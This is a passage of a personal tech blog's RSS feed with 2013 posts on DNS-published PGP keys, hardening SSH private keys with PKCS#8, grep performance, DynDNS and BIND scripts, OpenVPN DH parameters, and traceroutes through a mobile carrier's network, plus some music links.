  4489. '/fingerprint/{printf("%s._pka.%s. TXT \"v=pka1;fpr=%s;uri=%s\"\n",local,domain,$4$5$6$7$8$9$10$11$12$13,url)}'</b>
  4490. andreas._pka.jaggi.info. TXT "v=pka1;fpr=1073501542F38352FC85788207A32EAB1C6AC951;uri=http://andreas-jaggi.ch/1C6AC951.asc"</pre>
  4491. <p>Test DNS resolution:</p>
  4492. <pre># <b>dig +short -t txt andreas._pka.jaggi.info.</b>
  4493. "v=pka1\;fpr=1388580990F38352FC85788207A32EAB1C6AC951\;uri=http://andreas-jaggi.ch/1C6AC951.asc"</pre>
  4494. <p>Test with GPG:</p>
  4495. <pre># <b>gpg --auto-key-locate pka -ea -r ${localpart}@${domain}</b></pre>
  4496. <p>
  4497. Detailed explanation of the different DNS publication mechanisms for PGP Keys:<br><a href="http://www.gushi.org/make-dns-cert/HOWTO.html" title="Publishing PGP Keys in DNS">Publishing PGP Keys in DNS</a></p>
  4498. <p>(<a href="https://grepular.com/Publishing_PGP_Keys_in_the_DNS" title="">via</a>)</p>
  4499. ]]></content:encoded>
  4500.  </item>
  4501.  
  4502.  <item>
  4503.    <title>Improve the security of your SSH private key files with PKCS#8</title>
  4504.    <link>https://blog.x-way.org/Networking/2013/12/29/Improve-the-security-of-your-SSH-private-key-files-with-PKCS8.html</link>
  4505.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=324210</guid>
  4506.    <dc:creator>Andreas Jaggi</dc:creator>
  4507.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  4508.    <pubDate>Sun, 29 Dec 2013 15:23:00 +0000</pubDate>
  4509.    <category domain="https://blog.x-way.org/Networking">Networking</category>
  4510.    <description><![CDATA[<p>Instead of the easily brute-forceable one-pass MD5/AES128 password protection format used by SSH per default, you should use the <a href="https://www.rfc-editor.org/rfc/rfc5208.html" title="RFC 5208 - PKCS#8: Private-Key Information Syntax Specification Version 1.2">PKCS#8</a> format to store your private key files. PKCS#8 allows to choose proper key-derivation functions and encryption schemes (for example <a href="http://en.wikipedia.org/wiki/PBKDF2" title="Password-Based Key Derivation Function 2">PBKDF2</a> and <a href="https://www.rfc-editor.org/rfc/rfc2898.html#section-6.2" title="Password-Based Encryption Scheme 2">PBES2</a>).<br>
  4511. The following commands convert an existing password protected SSH private key file to PKCS#8 format (using PBKDF2, PBES2 and AES-256):</p>
  4512. <pre>
  4513. mv ~/.ssh/id_rsa{,.old}
  4514. openssl pkcs8 -topk8 -v2 aes256 -in ~/.ssh/id_rsa.old -out ~/.ssh/id_rsa
  4515. chmod 600 ~/.ssh/id_rsa
  4516. rm ~/.ssh/id_rsa.old
  4517. </pre>
  4518. <p>(via <a href="http://martin.kleppmann.com/2013/05/24/improving-security-of-ssh-private-keys.html" title="Improving the security of your SSH private key files - Martin Kleppmann's blog">Martin Kleppmann</a>)</p>
  4519. ]]></description>
  4520.    <content:encoded><![CDATA[<p>Instead of the easily brute-forceable one-pass MD5/AES128 password protection format used by SSH per default, you should use the <a href="https://www.rfc-editor.org/rfc/rfc5208.html" title="RFC 5208 - PKCS#8: Private-Key Information Syntax Specification Version 1.2">PKCS#8</a> format to store your private key files. PKCS#8 allows to choose proper key-derivation functions and encryption schemes (for example <a href="http://en.wikipedia.org/wiki/PBKDF2" title="Password-Based Key Derivation Function 2">PBKDF2</a> and <a href="https://www.rfc-editor.org/rfc/rfc2898.html#section-6.2" title="Password-Based Encryption Scheme 2">PBES2</a>).<br>
  4521. The following commands convert an existing password protected SSH private key file to PKCS#8 format (using PBKDF2, PBES2 and AES-256):</p>
  4522. <pre>
  4523. mv ~/.ssh/id_rsa{,.old}
  4524. openssl pkcs8 -topk8 -v2 aes256 -in ~/.ssh/id_rsa.old -out ~/.ssh/id_rsa
  4525. chmod 600 ~/.ssh/id_rsa
  4526. rm ~/.ssh/id_rsa.old
  4527. </pre>
  4528. <p>(via <a href="http://martin.kleppmann.com/2013/05/24/improving-security-of-ssh-private-keys.html" title="Improving the security of your SSH private key files - Martin Kleppmann's blog">Martin Kleppmann</a>)</p>
  4529. ]]></content:encoded>
  4530.  </item>
  4531.  
  4532.  <item>
  4533.    <title>Make grep 50x faster</title>
  4534.    <link>https://blog.x-way.org/Linux/2013/12/15/Make-grep-50x-faster.html</link>
  4535.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=324209</guid>
  4536.    <dc:creator>Andreas Jaggi</dc:creator>
  4537.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  4538.    <pubDate>Sun, 15 Dec 2013 14:33:00 +0000</pubDate>
  4539.    <category domain="https://blog.x-way.org/Linux">Linux</category>
  4540.    <description><![CDATA[<p>
  4541. Found this neat trick in Brendan Gregg's <a href="https://www.usenix.org/conference/lisa13/data-engineering-complex-systems" title="Blazing Performance with Flame Graphs">Blazing Performance with Flame Graphs</a> talk.
  4542. </p>
  4543.  
  4544. <blockquote><p>Switching to LANG=C improved performance by <strong>2000x</strong></p></blockquote>
  4545.  
  4546. <p>
  4547. In a quick test I directly got a performance gain of factor <strong>50.22</strong>.<br>
  4548. This is quite an achievement for only changing one environment variable.
  4549. </p>
  4550.  
  4551. <pre>
  4552. real:~# du -sh /var/log/querylog
  4553. 148M /var/log/querylog
  4554. real:~# time grep -i e /var/log/querylog &gt; /dev/null
  4555.  
  4556. real 0m12.807s
  4557. user 0m12.437s
  4558. sys 0m0.068s
  4559. real:~# time LANG=C grep -i e /var/log/querylog &gt; /dev/null
  4560.  
  4561. real 0m0.255s
  4562. user 0m0.196s
  4563. sys 0m0.052s
  4564. </pre>
  4565.  
  4566. <p>
  4567. I suspect that the performance gain may vary quite a lot depending on the search pattern.
  4568. Also, please note that this trick only works when you know that the involved files and search patterns are ASCII only.
  4569. </p>
  4570. <p>(via <a href="http://www.standalone-sysadmin.com/blog/2013/11/lisa13-conference-review-overview-thing/" title="LISA13 Conference Review / Overview Thing | Standalone Sysadmin">Standalone Sysadmin</a>)</p>
  4571. ]]></description>
  4572.    <content:encoded><![CDATA[<p>
  4573. Found this neat trick in Brendan Gregg's <a href="https://www.usenix.org/conference/lisa13/data-engineering-complex-systems" title="Blazing Performance with Flame Graphs">Blazing Performance with Flame Graphs</a> talk.
  4574. </p>
  4575.  
  4576. <blockquote><p>Switching to LANG=C improved performance by <strong>2000x</strong></p></blockquote>
  4577.  
  4578. <p>
  4579. In a quick test I directly got a performance gain of factor <strong>50.22</strong>.<br>
  4580. This is quite an achievement for only changing one environment variable.
  4581. </p>
  4582.  
  4583. <pre>
  4584. real:~# du -sh /var/log/querylog
  4585. 148M /var/log/querylog
  4586. real:~# time grep -i e /var/log/querylog &gt; /dev/null
  4587.  
  4588. real 0m12.807s
  4589. user 0m12.437s
  4590. sys 0m0.068s
  4591. real:~# time LANG=C grep -i e /var/log/querylog &gt; /dev/null
  4592.  
  4593. real 0m0.255s
  4594. user 0m0.196s
  4595. sys 0m0.052s
  4596. </pre>
  4597.  
  4598. <p>
  4599. I suspect that the performance gain may vary quite a lot depending on the search pattern.
  4600. Also, please note that this trick only works when you know that the involved files and search patterns are ASCII only.
  4601. </p>
  4602. <p>(via <a href="http://www.standalone-sysadmin.com/blog/2013/11/lisa13-conference-review-overview-thing/" title="LISA13 Conference Review / Overview Thing | Standalone Sysadmin">Standalone Sysadmin</a>)</p>
  4603. ]]></content:encoded>
  4604.  </item>
  4605.  
  4606.  <item>
  4607.    <title>WOODKID</title>
  4608.    <link>https://blog.x-way.org/Music/2013/12/01/WOODKID.html</link>
  4609.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=324208</guid>
  4610.    <dc:creator>Andreas Jaggi</dc:creator>
  4611.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  4612.    <pubDate>Sun, 01 Dec 2013 12:36:00 +0000</pubDate>
  4613.    <category domain="https://blog.x-way.org/Music">Music</category>
  4614.    <description><![CDATA[<p>Another nice discovery from <a href="http://www.metropop.ch/" title="Metropop Festival Lausanne">Metropop</a>: <a href="http://www.woodkid.com/" title="WOODKID">WOODKID</a></p>
  4615. <p><a href="https://youtu.be/lmc21V-zBq0" title="Woodkid - Run Boy Run - YouTube">Woodkid - Run Boy Run</a></p>
  4616.  
  4617. ]]></description>
  4618.    <content:encoded><![CDATA[<p>Another nice discovery from <a href="http://www.metropop.ch/" title="Metropop Festival Lausanne">Metropop</a>: <a href="http://www.woodkid.com/" title="WOODKID">WOODKID</a></p>
  4619. <p><a href="https://youtu.be/lmc21V-zBq0" title="Woodkid - Run Boy Run - YouTube">Woodkid - Run Boy Run</a></p>
  4620.  
  4621. ]]></content:encoded>
  4622.  </item>
  4623.  
  4624.  <item>
  4625.    <title>Major Look - Too Late</title>
  4626.    <link>https://blog.x-way.org/Music/2013/08/21/Major-Look-Too-Late.html</link>
  4627.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=324207</guid>
  4628.    <dc:creator>Andreas Jaggi</dc:creator>
  4629.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  4630.    <pubDate>Wed, 21 Aug 2013 14:15:00 +0000</pubDate>
  4631.    <category domain="https://blog.x-way.org/Music">Music</category>
  4632.    <description><![CDATA[<p><a href="https://youtu.be/rBpeOlFdES4" title="Major Look - Too Late - YouTube">Major Look - Too Late</a></p>
  4633. ]]></description>
  4634.    <content:encoded><![CDATA[<p><a href="https://youtu.be/rBpeOlFdES4" title="Major Look - Too Late - YouTube">Major Look - Too Late</a></p>
  4635. ]]></content:encoded>
  4636.  </item>
  4637.  
  4638.  <item>
  4639.    <title>Mandatory requirement for all non IPv6 capable products</title>
  4640.    <link>https://blog.x-way.org/Networking/2013/07/05/Mandatory-requirement-for-all-non-IPv6-capable-products.html</link>
  4641.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=324206</guid>
  4642.    <dc:creator>Andreas Jaggi</dc:creator>
  4643.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  4644.    <pubDate>Fri, 05 Jul 2013 09:37:00 +0000</pubDate>
  4645.    <category domain="https://blog.x-way.org/Networking">Networking</category>
  4646.    <description><![CDATA[<p><img src="https://blog.x-way.org/images/legacy-ip-only.svg" alt="IPv4 only"></p>
  4647. <p>(via <a href="https://web.archive.org/web/20160506160448/http://blog.quux.de/?p=1677" title="Jens' BLOG (archive.org)">blog.quux.de</a>)</p>
  4648. ]]></description>
  4649.    <content:encoded><![CDATA[<p><img src="https://blog.x-way.org/images/legacy-ip-only.svg" alt="IPv4 only"></p>
  4650. <p>(via <a href="https://web.archive.org/web/20160506160448/http://blog.quux.de/?p=1677" title="Jens' BLOG (archive.org)">blog.quux.de</a>)</p>
  4651. ]]></content:encoded>
  4652.  </item>
  4653.  
  4654.  <item>
  4655.    <title>Run your own DynDNS server</title>
  4656.    <link>https://blog.x-way.org/Networking/2013/06/01/Run-your-own-DynDNS-server.html</link>
  4657.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=324205</guid>
  4658.    <dc:creator>Andreas Jaggi</dc:creator>
  4659.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  4660.    <pubDate>Sat, 01 Jun 2013 21:11:00 +0000</pubDate>
  4661.    <category domain="https://blog.x-way.org/Networking">Networking</category>
  4662.    <description><![CDATA[<p>After receiving yet another 'please login and click through our captcha for no reason' e-mail from a DynDNS provider, I decided to run my own DynDNS server.</p>
  4663. <p>As I already run my own DNS servers, this was just a matter of adding a dynamically updateable zone and writing a script which receives the IP change request via HTTP and sends out a DNS update.<br>
  4664. Luckily the <a href="http://dyn.com/support/developers/api/perform-update/" title="Perform Update - Dyn">DynDNS API</a> is quite well documented and I quickly came up with the PHP code below which performs the task well enough for me. Feel free to use it to run your own DynDNS server.</p>
  4665. <p>PS: to any friends reading this and looking for a DynDNS service: drop me a message and I'll set you up with an account.</p>
  4666. <script src="https://gist.github.com/x-way/5691358.js"></script>
  4667. ]]></description>
  4668.    <content:encoded><![CDATA[<p>After receiving yet another 'please login and click through our captcha for no reason' e-mail from a DynDNS provider, I decided to run my own DynDNS server.</p>
  4669. <p>As I already run my own DNS servers, this was just a matter of adding a dynamically updateable zone and writing a script which receives the IP change request via HTTP and sends out a DNS update.<br>
  4670. Luckily the <a href="http://dyn.com/support/developers/api/perform-update/" title="Perform Update - Dyn">DynDNS API</a> is quite well documented and I quickly came up with the PHP code below which performs the task well enough for me. Feel free to use it to run your own DynDNS server.</p>
  4671. <p>PS: to any friends reading this and looking for a DynDNS service: drop me a message and I'll set you up with an account.</p>
  4672. <script src="https://gist.github.com/x-way/5691358.js"></script>
  4673. ]]></content:encoded>
  4674.  </item>
  4675.  
  4676.  <item>
  4677.    <title>glue_records.sh</title>
  4678.    <link>https://blog.x-way.org/Networking/2013/05/28/glue_records-sh.html</link>
  4679.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=324204</guid>
  4680.    <dc:creator>Andreas Jaggi</dc:creator>
  4681.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  4682.    <pubDate>Tue, 28 May 2013 18:37:00 +0000</pubDate>
  4683.    <category domain="https://blog.x-way.org/Networking">Networking</category>
  4684.    <description><![CDATA[<p>Get the <a href="http://en.wikipedia.org/wiki/Glue_record#Circular_dependencies_and_glue_records" title="Domain Name System - Wikipedia">glue records</a> for a given domain:</p>
  4685. <script src="https://gist.github.com/x-way/5661355.js"></script>
  4686. ]]></description>
  4687.    <content:encoded><![CDATA[<p>Get the <a href="http://en.wikipedia.org/wiki/Glue_record#Circular_dependencies_and_glue_records" title="Domain Name System - Wikipedia">glue records</a> for a given domain:</p>
  4688. <script src="https://gist.github.com/x-way/5661355.js"></script>
  4689. ]]></content:encoded>
  4690.  </item>
  4691.  
  4692.  <item>
  4693.    <title>update_serials.sh</title>
  4694.    <link>https://blog.x-way.org/Networking/2013/05/26/update_serials-sh.html</link>
  4695.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=324203</guid>
  4696.    <dc:creator>Andreas Jaggi</dc:creator>
  4697.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  4698.    <pubDate>Sun, 26 May 2013 08:29:00 +0000</pubDate>
  4699.    <category domain="https://blog.x-way.org/Networking">Networking</category>
  4700.    <description><![CDATA[<p>Update the serial number in BIND zone files with the current unix timestamp.</p>
  4701. <script src="https://gist.github.com/x-way/5651802.js"></script>
  4702. ]]></description>
  4703.    <content:encoded><![CDATA[<p>Update the serial number in BIND zone files with the current unix timestamp.</p>
  4704. <script src="https://gist.github.com/x-way/5651802.js"></script>
  4705. ]]></content:encoded>
  4706.  </item>
  4707.  
  4708.  <item>
  4709.    <title>less with colors</title>
  4710.    <link>https://blog.x-way.org/Linux/2013/05/25/less-with-colors.html</link>
  4711.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=324202</guid>
  4712.    <dc:creator>Andreas Jaggi</dc:creator>
  4713.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  4714.    <pubDate>Sat, 25 May 2013 19:29:00 +0000</pubDate>
  4715.    <category domain="https://blog.x-way.org/Linux">Linux</category>
  4716.    <description><![CDATA[<p>For a long time it annoyed me everytime that less only showed ASCII codes instead of colors when piping some 'color-enabled' output into it.</p>
  4717. <p>Turns out there is an easy fix for that:</p>
  4718. <pre>colordiff a/foo b/foo | less -R</pre>
  4719. <p>Thanks to <a href="http://major.io/2013/05/21/handling-terminal-color-escape-sequences-in-less/" title="Handling terminal color escape sequences in less | major.io">Major Hayden</a> for this very useful tip!</p>
  4720. ]]></description>
  4721.    <content:encoded><![CDATA[<p>For a long time it annoyed me everytime that less only showed ASCII codes instead of colors when piping some 'color-enabled' output into it.</p>
  4722. <p>Turns out there is an easy fix for that:</p>
  4723. <pre>colordiff a/foo b/foo | less -R</pre>
  4724. <p>Thanks to <a href="http://major.io/2013/05/21/handling-terminal-color-escape-sequences-in-less/" title="Handling terminal color escape sequences in less | major.io">Major Hayden</a> for this very useful tip!</p>
  4725. ]]></content:encoded>
  4726.  </item>
  4727.  
  4728.  <item>
  4729.    <title>Howto generate DH parameters for OpenVPN</title>
  4730.    <link>https://blog.x-way.org/Linux/2013/02/27/Howto-generate-DH-parameters-for-OpenVPN.html</link>
  4731.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=324201</guid>
  4732.    <dc:creator>Andreas Jaggi</dc:creator>
  4733.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  4734.    <pubDate>Wed, 27 Feb 2013 18:29:00 +0000</pubDate>
  4735.    <category domain="https://blog.x-way.org/Linux">Linux</category>
  4736.    <description><![CDATA[<pre>openssl gendh -out dh4096.pem 4096</pre>
  4737. ]]></description>
  4738.    <content:encoded><![CDATA[<pre>openssl gendh -out dh4096.pem 4096</pre>
  4739. ]]></content:encoded>
  4740.  </item>
  4741.  
  4742.  <item>
  4743.    <title>Orange Routing 2</title>
  4744.    <link>https://blog.x-way.org/Networking/2013/02/25/Orange-Routing-2.html</link>
  4745.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=324200</guid>
  4746.    <dc:creator>Andreas Jaggi</dc:creator>
  4747.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  4748.    <pubDate>Mon, 25 Feb 2013 13:20:00 +0000</pubDate>
  4749.    <category domain="https://blog.x-way.org/Networking">Networking</category>
  4750.    <description><![CDATA[<p>I did another test of the <a href="https://blog.x-way.org/Networking/2013/02/25/Orange-Routing.html" title="x-log - Orange Routing">Orange Routing</a>.<br>Running a traceroute to my server in Zurich and one to my vhost in Frankfurt.<br>First another version of the already familier traceroute to my server in Zurich:</p>
  4751. <pre>HOST: Andreass-MacBook-Pro.local  Loss%   Snt   Last   Avg  Best  Wrst StDev
  4752.  1.|-- 172.20.10.1                0.0%     5    8.0   3.7   2.1   8.0   2.5
  4753.  2.|-- 10.8.8.67                  0.0%     5  174.8 114.9  56.7 205.6  69.8
  4754.  3.|-- 10.8.12.10                 0.0%     5  126.8 108.4  67.7 171.3  42.8
  4755.  4.|-- 192.168.249.201            0.0%     5   73.4  82.7  61.9 111.5  20.5
  4756.  5.|-- 192.168.253.191            0.0%     5   54.0  64.9  54.0  75.9   9.3
  4757.  6.|-- 192.168.250.203            0.0%     5   64.7  69.2  57.3  79.2   8.4
  4758.  7.|-- 10.10.10.10                0.0%     5   56.8  65.5  56.8  72.1   7.7
  4759.  8.|-- 10.255.200.1               0.0%     5   65.9  87.3  60.1 146.6  35.1
  4760.  9.|-- pos0-1-1-1.gencr1.geneve.  0.0%     5   84.8 117.1  76.4 162.5  36.9
  4761. 10.|-- pos14-0-1.pascr4.paris.op  0.0%     5   88.1 118.0  88.1 168.3  36.7
  4762. 11.|-- ge6-0-0.br2.par2.alter.ne  0.0%     5   76.5  90.5  76.5 109.1  12.0
  4763. 12.|-- so-2-3-0.xt2.zur3.alter.n  0.0%     5   76.8 109.1  76.8 203.2  53.1
  4764. 13.|-- pos2-0.gw4.zur4.alter.net  0.0%     5   88.8  98.7  84.3 143.4  25.2
  4765. 14.|-- uch200193-gw.customer.alt  0.0%     5   90.7  85.3  74.1  93.5   8.0
  4766. 15.|-- whale29.open.ch            0.0%     5   88.9  97.7  88.9 104.7   6.3
  4767. 16.|-- orca8.open.ch              0.0%     5   90.8  94.8  90.8 102.8   4.9
  4768. 17.|-- real.jaggi.info           20.0%     5  234.8 130.0  92.8 234.8  69.9</pre>
  4769. <p>Now the traceroute to the vhost in Frankfurt:</p>
  4770. <pre>HOST: Andreass-MacBook-Pro.local  Loss%   Snt   Last   Avg  Best  Wrst StDev
  4771.  1.|-- 172.20.10.1                0.0%     5   15.2  13.1   1.9  44.5  18.4
  4772.  2.|-- 10.8.8.115                 0.0%     5   72.6  74.0  67.2  81.3   6.8
  4773.  3.|-- 10.8.12.10                 0.0%     5   80.7  75.0  64.0  89.6  10.3
  4774.  4.|-- 192.168.249.201            0.0%     5   65.1  78.9  65.1  94.0  12.3
  4775.  5.|-- 192.168.253.191            0.0%     5   73.1  70.4  66.5  73.3   2.8
  4776.  6.|-- 192.168.250.203            0.0%     5   69.5  73.9  66.3  86.6   7.7
  4777.  7.|-- 10.10.10.10                0.0%     5   67.0  72.7  67.0  80.0   4.9
  4778.  8.|-- 10.255.200.1               0.0%     5   70.9  74.4  69.7  86.4   7.0
  4779.  9.|-- pos0-1-1-1.gencr1.geneve.  0.0%     5   77.2  83.4  75.9  99.4   9.4
  4780. 10.|-- pos3-1-0.zurcr1.zurich.op  0.0%     5   83.8 103.2  83.8 146.9  26.3
  4781. 11.|-- pos0-9-4-0.ffttr1.frankfu  0.0%     5  102.9 103.6  98.7 108.8   4.9
  4782. 12.|-- leaseweb-9.gw.opentransit  0.0%     5   87.6  88.8  85.3  93.2   3.0
  4783. 13.|-- te3-1.core-2.fra.leaseweb  0.0%     5   85.4  91.5  85.4 106.1   8.5
  4784. 14.|-- hosted-by.leaseweb.com     0.0%     5   90.2  94.1  84.7 112.5  11.0
  4785. 15.|-- ???                       100.0     5    0.0   0.0   0.0   0.0   0.0
  4786. 16.|-- 0.jaggi.info              20.0%     5   89.9 117.5  86.3 205.5  58.7</pre>
  4787. <p>As you can see, the RTT is higher for the server in Zurich than for the vhost in Frankfurt! (keep in mind that source of these measurement is my laptop in the train 8 minutes away from Zurich now)</p>
  4788. <p>So Orange has higher latency to hosts in the same region/city than to hosts in another country which are more than 350km away. :-(<br>The next time I choose a mobile provider it might be good to analyse its BGP peerings and routing policies first...</p>
  4789. ]]></description>
  4790.    <content:encoded><![CDATA[<p>I did another test of the <a href="https://blog.x-way.org/Networking/2013/02/25/Orange-Routing.html" title="x-log - Orange Routing">Orange Routing</a>.<br>Running a traceroute to my server in Zurich and one to my vhost in Frankfurt.<br>First another version of the already familier traceroute to my server in Zurich:</p>
  4791. <pre>HOST: Andreass-MacBook-Pro.local  Loss%   Snt   Last   Avg  Best  Wrst StDev
  4792.  1.|-- 172.20.10.1                0.0%     5    8.0   3.7   2.1   8.0   2.5
  4793.  2.|-- 10.8.8.67                  0.0%     5  174.8 114.9  56.7 205.6  69.8
  4794.  3.|-- 10.8.12.10                 0.0%     5  126.8 108.4  67.7 171.3  42.8
  4795.  4.|-- 192.168.249.201            0.0%     5   73.4  82.7  61.9 111.5  20.5
  4796.  5.|-- 192.168.253.191            0.0%     5   54.0  64.9  54.0  75.9   9.3
  4797.  6.|-- 192.168.250.203            0.0%     5   64.7  69.2  57.3  79.2   8.4
  4798.  7.|-- 10.10.10.10                0.0%     5   56.8  65.5  56.8  72.1   7.7
  4799.  8.|-- 10.255.200.1               0.0%     5   65.9  87.3  60.1 146.6  35.1
  4800.  9.|-- pos0-1-1-1.gencr1.geneve.  0.0%     5   84.8 117.1  76.4 162.5  36.9
  4801. 10.|-- pos14-0-1.pascr4.paris.op  0.0%     5   88.1 118.0  88.1 168.3  36.7
  4802. 11.|-- ge6-0-0.br2.par2.alter.ne  0.0%     5   76.5  90.5  76.5 109.1  12.0
  4803. 12.|-- so-2-3-0.xt2.zur3.alter.n  0.0%     5   76.8 109.1  76.8 203.2  53.1
  4804. 13.|-- pos2-0.gw4.zur4.alter.net  0.0%     5   88.8  98.7  84.3 143.4  25.2
  4805. 14.|-- uch200193-gw.customer.alt  0.0%     5   90.7  85.3  74.1  93.5   8.0
  4806. 15.|-- whale29.open.ch            0.0%     5   88.9  97.7  88.9 104.7   6.3
  4807. 16.|-- orca8.open.ch              0.0%     5   90.8  94.8  90.8 102.8   4.9
  4808. 17.|-- real.jaggi.info           20.0%     5  234.8 130.0  92.8 234.8  69.9</pre>
  4809. <p>Now the traceroute to the vhost in Frankfurt:</p>
  4810. <pre>HOST: Andreass-MacBook-Pro.local  Loss%   Snt   Last   Avg  Best  Wrst StDev
  4811.  1.|-- 172.20.10.1                0.0%     5   15.2  13.1   1.9  44.5  18.4
  4812.  2.|-- 10.8.8.115                 0.0%     5   72.6  74.0  67.2  81.3   6.8
  4813.  3.|-- 10.8.12.10                 0.0%     5   80.7  75.0  64.0  89.6  10.3
  4814.  4.|-- 192.168.249.201            0.0%     5   65.1  78.9  65.1  94.0  12.3
  4815.  5.|-- 192.168.253.191            0.0%     5   73.1  70.4  66.5  73.3   2.8
  4816.  6.|-- 192.168.250.203            0.0%     5   69.5  73.9  66.3  86.6   7.7
  4817.  7.|-- 10.10.10.10                0.0%     5   67.0  72.7  67.0  80.0   4.9
  4818.  8.|-- 10.255.200.1               0.0%     5   70.9  74.4  69.7  86.4   7.0
  4819.  9.|-- pos0-1-1-1.gencr1.geneve.  0.0%     5   77.2  83.4  75.9  99.4   9.4
  4820. 10.|-- pos3-1-0.zurcr1.zurich.op  0.0%     5   83.8 103.2  83.8 146.9  26.3
  4821. 11.|-- pos0-9-4-0.ffttr1.frankfu  0.0%     5  102.9 103.6  98.7 108.8   4.9
  4822. 12.|-- leaseweb-9.gw.opentransit  0.0%     5   87.6  88.8  85.3  93.2   3.0
  4823. 13.|-- te3-1.core-2.fra.leaseweb  0.0%     5   85.4  91.5  85.4 106.1   8.5
  4824. 14.|-- hosted-by.leaseweb.com     0.0%     5   90.2  94.1  84.7 112.5  11.0
  4825. 15.|-- ???                       100.0     5    0.0   0.0   0.0   0.0   0.0
  4826. 16.|-- 0.jaggi.info              20.0%     5   89.9 117.5  86.3 205.5  58.7</pre>
  4827. <p>As you can see, the RTT is higher for the server in Zurich than for the vhost in Frankfurt! (keep in mind that source of these measurement is my laptop in the train 8 minutes away from Zurich now)</p>
  4828. <p>So Orange has higher latency to hosts in the same region/city than to hosts in another country which are more than 350km away. :-(<br>The next time I choose a mobile provider it might be good to analyse its BGP peerings and routing policies first...</p>
  4829. ]]></content:encoded>
  4830.  </item>
  4831.  
  4832.  <item>
  4833.    <title>Orange Routing</title>
  4834.    <link>https://blog.x-way.org/Networking/2013/02/25/Orange-Routing.html</link>
  4835.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=324199</guid>
  4836.    <dc:creator>Andreas Jaggi</dc:creator>
  4837.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  4838.    <pubDate>Mon, 25 Feb 2013 12:34:00 +0000</pubDate>
  4839.    <category domain="https://blog.x-way.org/Networking">Networking</category>
  4840.    <description><![CDATA[<p>While in the train from Bern to Zurich, I did a traceroute towards the server which currently hosts this weblog (it is located at <a href="http://www.open.ch" title="Open Systems">Open Systems</a> in Zurich). The connection starts on my laptop and is thethered via my cell to the Orange backbone.</p>
  4841. <pre>HOST: Andreass-MacBook-Pro.local  Loss%   Snt   Last   Avg  Best  Wrst StDev
  4842.  1.|-- 172.20.10.1                0.0%     5    2.0  12.1   1.7  33.2  14.6
  4843.  2.|-- 10.8.8.67                  0.0%     5   52.2 373.4  52.2 1241. 504.8
  4844.  3.|-- 10.8.12.10                 0.0%     5   50.9 347.4  50.9 1143. 453.3
  4845.  4.|-- 192.168.249.201            0.0%     5   51.2 282.7  51.2 1042. 426.8
  4846.  5.|-- 192.168.253.191            0.0%     5   51.2 226.2  44.5 942.2 400.3
  4847.  6.|-- 192.168.250.203            0.0%     5   51.4 206.7  37.9 847.5 358.2
  4848.  7.|-- 10.10.10.10                0.0%     5   50.0 181.4  29.6 746.9 316.2
  4849.  8.|-- 10.255.200.1               0.0%     5   50.0 172.2  36.9 645.6 264.9
  4850.  9.|-- 193.251.248.145            0.0%     4   60.2  59.8  46.2  81.9  15.8
  4851. 10.|-- 193.251.240.53             0.0%     4   70.0  76.4  64.9 101.6  16.9
  4852. 11.|-- 146.188.112.77             0.0%     4   70.4  74.0  69.2  83.8   6.7
  4853. 12.|-- 146.188.5.1                0.0%     4   70.6  71.7  58.1  88.1  12.3
  4854. 13.|-- 146.188.4.194              0.0%     4   70.5  61.9  51.6  70.9  10.2
  4855. 14.|-- 146.188.64.74              0.0%     4   71.3  69.2  58.8  75.4   7.2
  4856. 15.|-- 213.156.230.29             0.0%     4   71.5  78.3  62.6 108.9  20.7
  4857. 16.|-- 213.156.229.8              0.0%     4   72.2  75.2  70.4  81.9   5.1
  4858. 17.|-- 213.156.229.222           25.0%     4   80.8  76.2  61.2  86.5  13.3</pre>
  4859. <p>You can see that the traffic is passed through 8 different routers inside the Orange backbone (using IPs from all three RFC1918 ranges...) before it is let onto the Internet.<br>
  4860. And then the real fun starts (let's use DNS names for this):</p>
  4861. <pre>HOST: Andreass-MacBook-Pro.local  Loss%   Snt   Last   Avg  Best  Wrst StDev
  4862.  1.|-- 172.20.10.1                0.0%     5    2.0  12.2   1.9  33.3  14.5
  4863.  2.|-- 10.8.8.67                  0.0%     5   44.2 345.6  27.0 1167. 494.2
  4864.  3.|-- 10.8.12.10                 0.0%     5   52.2 308.9  27.0 1104. 462.4
  4865.  4.|-- 192.168.249.201            0.0%     5   33.4 264.9  27.2 1014. 427.1
  4866.  5.|-- 192.168.253.191            0.0%     5   30.3 227.5  27.3 952.9 406.4
  4867.  6.|-- 192.168.250.203            0.0%     5   50.4 200.7  27.0 860.0 368.7
  4868.  7.|-- 10.10.10.10                0.0%     5   72.4 193.5  30.5 779.2 327.8
  4869.  8.|-- 10.255.200.1               0.0%     5   31.8 166.8  27.6 688.0 291.5
  4870.  9.|-- pos0-1-1-1.gencr1.geneve.  0.0%     4   50.8  55.0  47.6  67.1   8.6
